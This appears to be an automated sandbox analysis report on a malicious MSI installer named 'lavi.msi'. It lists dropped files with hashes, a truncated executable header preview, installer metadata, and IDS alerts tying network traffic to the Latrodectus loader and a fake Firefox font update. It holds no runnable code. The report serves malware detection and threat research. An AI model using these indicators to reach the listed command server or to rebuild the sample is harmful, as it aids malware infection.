                                                                                                                                                          SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Installer\SourceHash{BEA6F49C-A398-4148-AFB8-A4A1F2844AFA}

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):20480
                                                                                                                                                          Entropy (8bit):1.1610705500378629
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:JSbX72FjdAGiLIlHVRpzh/7777777777777777777777777vDHFmTu5Rp01l0i8Q:JnQI53Yu5s8F
                                                                                                                                                          MD5:434F1256BD3A1512E8F777D06D423E06
                                                                                                                                                          SHA1:480B214D329682582A7A7732B4683B71653ADB6B
                                                                                                                                                          SHA-256:04393CD51A1910F172DE0DF47EB55E2B3C82D9259EF312559EB7CE3864481BB2
                                                                                                                                                          SHA-512:BB1A7A934FDB62CFBF1BE0CD668E968F8E89E6C2563EC55142A28040A336FC29FE2B5AE2B7FFFF3C277529F67062C8528372645000D127F208B0125C2480EB1A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):20480
                                                                                                                                                          Entropy (8bit):1.5343237055833994
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:G8PhFuRc06WXOCFT5vIUPsHSgJAEkCyGG2HSgtTK8K:ZhF1UFT2UkH5KvCVfH54
                                                                                                                                                          MD5:379ABC7BAEE1E9B17C178DFE27D302EC
                                                                                                                                                          SHA1:A38D32CA99C4E82F3A194FFF6FBEB9693F8D454B
                                                                                                                                                          SHA-256:AC918A4D4842416AEB47FA24324F392DAB042B57D72FDBE74863C2456A913218
                                                                                                                                                          SHA-512:912C2BA531C9173E321957B894A4FAC5423B69C82F0798AF19923948BBF99E1797CB208E33DEE8B7FF7F6F5716BC995762FEF74A7791ED3B3BD625BAA47197FC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):360001
                                                                                                                                                          Entropy (8bit):5.36298284158752
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau0:zTtbmkExhMJCIpEZ
                                                                                                                                                          MD5:CFFF49353FCC764E37C57C3BECC3C7D3
                                                                                                                                                          SHA1:06CF69EF44C5584B686304B5BABFD6C4D9F62DA2
                                                                                                                                                          SHA-256:83BA488E797397764AE030A5ABCA47EB7EB0279E3590F7122551D5603C5B72E8
                                                                                                                                                          SHA-512:A8A242EFA1F401AFD3E4758571E73470D97E1B4B311C113ADB4D6E0A104214397E133C1A75045094FDDF225B4D5AB8DCA34D3B3251B9CA6E9D267E692457AB31
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                                                                          C:\Windows\Temp\~DF0BD86D1017DA67CB.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32768
                                                                                                                                                          Entropy (8bit):1.2321256188792842
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:XC9u2PvcFXOTT5LhIUPsHSgJAEkCyGG2HSgtTK8K:y94OTUUkH5KvCVfH54
                                                                                                                                                          MD5:D7C01E8F3B42D4F934B20538280A4DF6
                                                                                                                                                          SHA1:D5082C83336245DA4A54F6AD60A8A7EE2D31494A
                                                                                                                                                          SHA-256:478EA91C1CB1D5C3B0E0C1733CC069A3B1F72BBD2E021CC2B185BDB0B031022B
                                                                                                                                                          SHA-512:9F63860407818B65B86E947F843BBF38AFD2BEB2705845D36DF124914985CD3CF6035EAF1E1DB24C647D2FCC980159E233445A85A82BF0CDCC70C32ED8AE705E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Temp\~DF145B532D35C1B04E.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):20480
                                                                                                                                                          Entropy (8bit):1.5343237055833994
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:G8PhFuRc06WXOCFT5vIUPsHSgJAEkCyGG2HSgtTK8K:ZhF1UFT2UkH5KvCVfH54
                                                                                                                                                          MD5:379ABC7BAEE1E9B17C178DFE27D302EC
                                                                                                                                                          SHA1:A38D32CA99C4E82F3A194FFF6FBEB9693F8D454B
                                                                                                                                                          SHA-256:AC918A4D4842416AEB47FA24324F392DAB042B57D72FDBE74863C2456A913218
                                                                                                                                                          SHA-512:912C2BA531C9173E321957B894A4FAC5423B69C82F0798AF19923948BBF99E1797CB208E33DEE8B7FF7F6F5716BC995762FEF74A7791ED3B3BD625BAA47197FC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Temp\~DF26D95E3D0494C6A5.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):512
                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3::
                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Temp\~DF47D9813FA9DD5F5B.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):20480
                                                                                                                                                          Entropy (8bit):1.5343237055833994
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:G8PhFuRc06WXOCFT5vIUPsHSgJAEkCyGG2HSgtTK8K:ZhF1UFT2UkH5KvCVfH54
                                                                                                                                                          MD5:379ABC7BAEE1E9B17C178DFE27D302EC
                                                                                                                                                          SHA1:A38D32CA99C4E82F3A194FFF6FBEB9693F8D454B
                                                                                                                                                          SHA-256:AC918A4D4842416AEB47FA24324F392DAB042B57D72FDBE74863C2456A913218
                                                                                                                                                          SHA-512:912C2BA531C9173E321957B894A4FAC5423B69C82F0798AF19923948BBF99E1797CB208E33DEE8B7FF7F6F5716BC995762FEF74A7791ED3B3BD625BAA47197FC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Temp\~DF4B2A85E52E2F149F.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32768
                                                                                                                                                          Entropy (8bit):1.2321256188792842
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:XC9u2PvcFXOTT5LhIUPsHSgJAEkCyGG2HSgtTK8K:y94OTUUkH5KvCVfH54
                                                                                                                                                          MD5:D7C01E8F3B42D4F934B20538280A4DF6
                                                                                                                                                          SHA1:D5082C83336245DA4A54F6AD60A8A7EE2D31494A
                                                                                                                                                          SHA-256:478EA91C1CB1D5C3B0E0C1733CC069A3B1F72BBD2E021CC2B185BDB0B031022B
                                                                                                                                                          SHA-512:9F63860407818B65B86E947F843BBF38AFD2BEB2705845D36DF124914985CD3CF6035EAF1E1DB24C647D2FCC980159E233445A85A82BF0CDCC70C32ED8AE705E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Temp\~DF4FA08BA5F0A6142D.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32768
                                                                                                                                                          Entropy (8bit):0.0680023241589871
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOmTuKIdEoVky6l0t/:2F0i8n0itFzDHFmTu5o01
                                                                                                                                                          MD5:4FB58FE1D5CC331A5D874D0F396E8B0F
                                                                                                                                                          SHA1:FD23F6E7DA165E585D60185ABB95179BD349EFA4
                                                                                                                                                          SHA-256:8D8B81F85995EE111CE0BA925E4E1653B355DBD900B61BB513D761FF393BD9C8
                                                                                                                                                          SHA-512:252ED694BC4861DFC13C16B0F40EDCA0EE7F4FB1644C05106980AC24B11D39E344AA8E47CB96609F8E3E2AD9A8A347530CEAA41EA367C902CA3A1F62173CCBD6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Temp\~DF93F962909CBE455E.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):512
                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3::
                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Temp\~DFA977EF772019016A.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32768
                                                                                                                                                          Entropy (8bit):1.2321256188792842
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:XC9u2PvcFXOTT5LhIUPsHSgJAEkCyGG2HSgtTK8K:y94OTUUkH5KvCVfH54
                                                                                                                                                          MD5:D7C01E8F3B42D4F934B20538280A4DF6
                                                                                                                                                          SHA1:D5082C83336245DA4A54F6AD60A8A7EE2D31494A
                                                                                                                                                          SHA-256:478EA91C1CB1D5C3B0E0C1733CC069A3B1F72BBD2E021CC2B185BDB0B031022B
                                                                                                                                                          SHA-512:9F63860407818B65B86E947F843BBF38AFD2BEB2705845D36DF124914985CD3CF6035EAF1E1DB24C647D2FCC980159E233445A85A82BF0CDCC70C32ED8AE705E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Temp\~DFCC7ACB0D6C2DA564.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):512
                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3::
                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Temp\~DFE93A116A679AC165.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):512
                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3::
                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Temp\~DFECD923E3C25B1323.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):73728
                                                                                                                                                          Entropy (8bit):0.1263065537968079
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VKppoTxbApHipVbAppbApHipVbApJAEVbyjCyEpGVPwG+do+hTz:VK3oTEHSgMHSgJAEkCyGGqoUv
                                                                                                                                                          MD5:9F97714CD663BA87530D8B53D9B4FB10
                                                                                                                                                          SHA1:DA891E0F657B7824F8FE7C341BAE291E1AA2E9DD
                                                                                                                                                          SHA-256:0E60058AEA8B4DC6D0BE4ED63B9ACA7EF6B58DF0045A5C07CB8984170F82A277
                                                                                                                                                          SHA-512:ECEF2DD3A535D1EDFE2E06A7EA4637F90CC91D944B1D75F806BD38C63D2801BD77A64BF3A418AE2BED3F535A50581F359E9DEC76EEE024A02347FCC6618766D6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\Temp\~DFFCCB32ED9E5A333E.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):512
                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3::
                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {288EF131-2483-44D2-A86F-48308EA76F57}, Number of Words: 10, Subject: HtmControl, Author: COSACA LTD, Name of Creating Application: HtmControl, Template: ;1033, Comments: This installer database contains the logic and data required to install HtmControl., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                          Entropy (8bit):7.438024782173503
                                                                                                                                                          TrID:
                                                                                                                                                          • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                                                                                                          • Microsoft Windows Installer (60509/1) 46.00%
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                                                                                                          File name:lavi.msi
                                                                                                                                                          File size:2'131'456 bytes
                                                                                                                                                          MD5:c65899e2519f4ad21fb4b97f0a113362
                                                                                                                                                          SHA1:a1f854c29a69c19949499fca5e24b02b97be46fd
                                                                                                                                                          SHA256:025abbec1724b9180b369fe116da9d90ae47a4996f6a4e28e8a947bac1e0c741
                                                                                                                                                          SHA512:eca93cb24187735ec54d4b4e99675f87f1957e255f59c5432498bbc2c47c77b6ccfdf48861a2f78eb377307ce8f6e6458eaf4b766b96e6c2faea1fb87e3dcbb4
                                                                                                                                                          SSDEEP:49152:/c53YhW8zBQSc0ZnSKBZKumZr7Aej3YOXT7wYyr8lCV:QYY0Zn3K/Ai33XXZ0
                                                                                                                                                          TLSH:44A5F12233C6C537C9AE01307A1AD66B557DFCA74B3140D7A3C82A2EAE745C06639F97
                                                                                                                                                          File Content Preview:........................>...................!...................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F...G...H...I...J...K...L...M...N..................................................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:2d2e3797b32b2b99

                                                                                                                                                          Network Behavior

                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                          2024-11-13T10:59:33.580098+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.849706TCP
                                                                                                                                                          2024-11-13T11:00:14.462381+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.858082TCP
                                                                                                                                                          2024-11-13T11:02:03.714625+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858086172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:03.752840+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858086172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:07.268279+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858087172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:09.570724+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858087172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:10.283737+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858088172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:12.418373+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858088172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:13.168299+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858089172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:15.758465+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858089172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:16.484077+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858090172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:19.491450+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858090172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:20.188077+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858091172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:22.228995+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858091172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:22.999986+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858092172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:24.993858+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858092172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:25.685711+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858093172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:27.739909+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858093172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:28.465289+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858094172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:30.572059+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858094172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:31.244083+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858095172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:33.251417+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858095172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:33.980071+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858096172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:35.921884+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858096172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:36.615479+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858097172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:38.445231+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858097172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:39.128499+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858098172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:41.675497+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858098172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:42.362240+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858100172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:44.403551+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858100172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:45.124335+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858101172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:47.142344+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858101172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:47.841462+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858102172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:49.821123+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858102172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:50.512085+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858103172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:52.623944+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858103172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:53.401221+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858104172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:55.224697+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858104172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:56.355343+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858105172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:58.374492+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858105172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:02:59.151142+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858106172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:01.524516+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858106172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:02.236881+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858107172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:04.592517+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858107172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:05.299439+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858108172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:07.619002+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858108172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:08.311583+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858109172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:11.207625+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858109172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:11.897932+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858110172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:14.603701+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858110172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:15.448359+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858111172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:17.830438+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858111172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:18.492050+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858112172.67.191.232443TCP
